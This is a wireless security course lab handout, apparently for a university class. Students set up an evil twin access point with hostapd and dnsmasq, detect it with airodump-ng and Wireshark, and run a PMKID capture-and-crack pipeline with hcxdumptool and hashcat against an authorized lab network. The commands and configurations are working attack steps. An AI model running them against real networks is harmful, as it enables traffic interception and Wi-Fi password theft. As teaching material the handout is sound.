Classroom Glossary Public page

WIR-101 Lab 5 — Evil Twin Deployment + PMKID Attack (Combined)

777 words

Prerequisites: Weeks 4-5 lectures; hcxdumptool + hostapd + dnsmasq installed; authorized lab environment Duration: ~90 min Points: 100

Authorization

  • Lab Authorization Form signed
  • Evil twin target SSID: VCA-WIR101-LAB (authorized clone only)
  • PMKID capture target: VCA-WIR101-LAB (authorized)
  • No production SSIDs to be cloned; no captive portals harvesting real credentials
  • All test credentials used in this lab are fictional (provided below)

Objective

Deploy an evil twin AP targeting the authorized lab network. Understand how clients can be attracted to the rogue AP via signal strength. Separately, run a PMKID attack against the authorized lab AP and document the full toolchain.

This lab combines two exercises because both are conceptually rooted in Week 5 content (rogue AP threats) and the PMKID attack from Week 4 follows naturally into its evil-twin application.

Part A — Evil Twin Setup with hostapd (35 min)

Configure hostapd

Create /tmp/evil_twin.conf:

# /tmp/evil_twin.conf
interface=wlan1
driver=nl80211
ssid=VCA-WIR101-LAB
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0

Note: wlan1 must be a second wireless interface (not the same Alfa NIC used for monitor mode). If you only have one wireless NIC, use the instructor's provided second NIC or complete this in virtual mode (see Virtual Path below).

Configure dnsmasq (DHCP)

Create /tmp/dnsmasq_evil.conf:

interface=wlan1
dhcp-range=192.168.50.100,192.168.50.200,12h
dhcp-option=3,192.168.50.1
dhcp-option=6,192.168.50.1
server=8.8.8.8

Launch

# Assign IP to the wlan1 AP interface
sudo ip addr add 192.168.50.1/24 dev wlan1

# Start AP
sudo hostapd /tmp/evil_twin.conf &

# Start DHCP
sudo dnsmasq -C /tmp/dnsmasq_evil.conf --no-daemon &

Verify

Use a second machine or phone (with production Wi-Fi disabled) to scan for the evil twin SSID. It should appear as "VCA-WIR101-LAB" alongside the legitimate AP.

In airodump-ng from a third terminal in monitor mode (if you have a third interface -- otherwise verify via wireless scan):

sudo airodump-ng wlan0mon

You should see two entries for VCA-WIR101-LAB: the legitimate AP at its original BSSID, and your evil twin at your wlan1 MAC.

Deliverable A

  1. Screenshot of airodump-ng showing two BSSIDs for the same SSID
  2. Answers: (a) Why do both APs appear in the scan? (b) How would a client choose which one to connect to? (c) What would you do to maximize the chance clients connect to your evil twin instead of the legitimate AP?

Part B — Optional: Captive Portal Concept (10 min)

This section is concept-only. You will not deploy a credential-harvesting captive portal (that would collect real user credentials, even in a lab, which raises ethical concerns beyond this exercise).

Instead, create a simple HTML page that demonstrates the phishing concept:

# Create a benign "lab demonstration" captive portal page
mkdir -p /tmp/captive_demo
cat > /tmp/captive_demo/index.html <<'EOF'
<html><body>
<h2>LAB DEMONSTRATION ONLY</h2>
<p>In a real evil twin attack, this page would mimic the target organization's login page.</p>
<p>A user submitting credentials here would deliver them to the attacker.</p>
<p>This page is for educational demonstration only. No credentials are collected.</p>
</body></html>
EOF

# Serve it on port 8080
python3 -m http.server 8080 -d /tmp/captive_demo &

Connect your own test device to the evil twin AP. Navigate to 192.168.50.1:8080 in a browser. Observe the page.

Deliverable B

1 paragraph: explain the captive portal attack mechanism without deploying the actual phishing version. What would a real attacker's portal look like? How would they redirect HTTP traffic to it? Why does this bypass TLS?

Part C — Evil Twin Detection (10 min)

Switch back to the monitoring perspective. If an enterprise WIDS were watching:

# In airodump-ng, observe the two BSSIDs for the same SSID
# Record: different BSSIDs, possibly different channels, different signal levels

In a Wireshark capture from a monitoring interface:

  • Filter wlan.ssid == "VCA-WIR101-LAB" and observe Beacon frames from two different BSSIDs
  • The OUI of each BSSID identifies the vendor; mismatched OUIs for the same SSID is a Kismet alert trigger

Deliverable C

Wireshark screenshot showing Beacon frames from two BSSIDs for the same SSID + explanation of the detection mechanism.

Part D — PMKID Attack Review (20 min)

Run the PMKID attack against the authorized lab AP (same procedure as Lab 4, Part B). This time focus on the toolchain documentation rather than the mechanics.

sudo hcxdumptool -i wlan0mon -o lab5_pmkid.pcapng --enable_status=1
# Wait 2 min, Ctrl+C
hcxpcapngtool -o lab5_hash.22000 lab5_pmkid.pcapng
hashcat -m 22000 lab5_hash.22000 lab4_wordlist.txt

Document the following for each tool:

  • Command used (with flags)
  • What the tool does at each step
  • What format the data is in at the end of that step

Deliverable D

A "toolchain pipeline" diagram or table: input → hcxdumptool → pcapng → hcxpcapngtool → .22000 → hashcat → passphrase. For each arrow: data format, key content.

Teardown

sudo killall hostapd dnsmasq 2>/dev/null
sudo ip addr del 192.168.50.1/24 dev wlan1 2>/dev/null
sudo airmon-ng stop wlan0mon
sudo systemctl restart NetworkManager

Write-up Questions

  1. You set up an evil twin with the same SSID but a different BSSID. A client connects to your evil twin. Traffic flows through your machine. You do NOT have the WPA2-PSK passphrase. Can you read the client's traffic? Explain why or why not.
  2. You DO have the WPA2-PSK passphrase (you cracked it in Lab 4). Now can you decrypt the client's traffic while connected to your evil twin? What additional material would you need in Wireshark?
  3. WPA2-Enterprise (802.1X + RADIUS) is said to be resistant to evil twin attacks. What specific mechanism prevents the evil twin from impersonating the legitimate AP to a WPA2-Enterprise client?
  4. A mobile device running iOS 16+ uses MAC randomization per-network. Does this protect against the evil twin attack? Does it protect against the PMKID attack? Explain each.

Virtual Path

The virtual path for Parts A-C provides:

  • A narrated video walkthrough of the evil twin setup
  • A pre-captured Wireshark PCAP showing two-BSSID Beacon frames for the same SSID
  • The analysis and write-up questions are identical

Part D (PMKID attack) uses the same virtual capture as Lab 4.

Submission

Zip into lab5_YOURNAME.zip:

  • deliverable_A.md + screenshot
  • deliverable_B.md
  • deliverable_C.md + Wireshark screenshot
  • deliverable_D.md (toolchain diagram)
  • writeup.md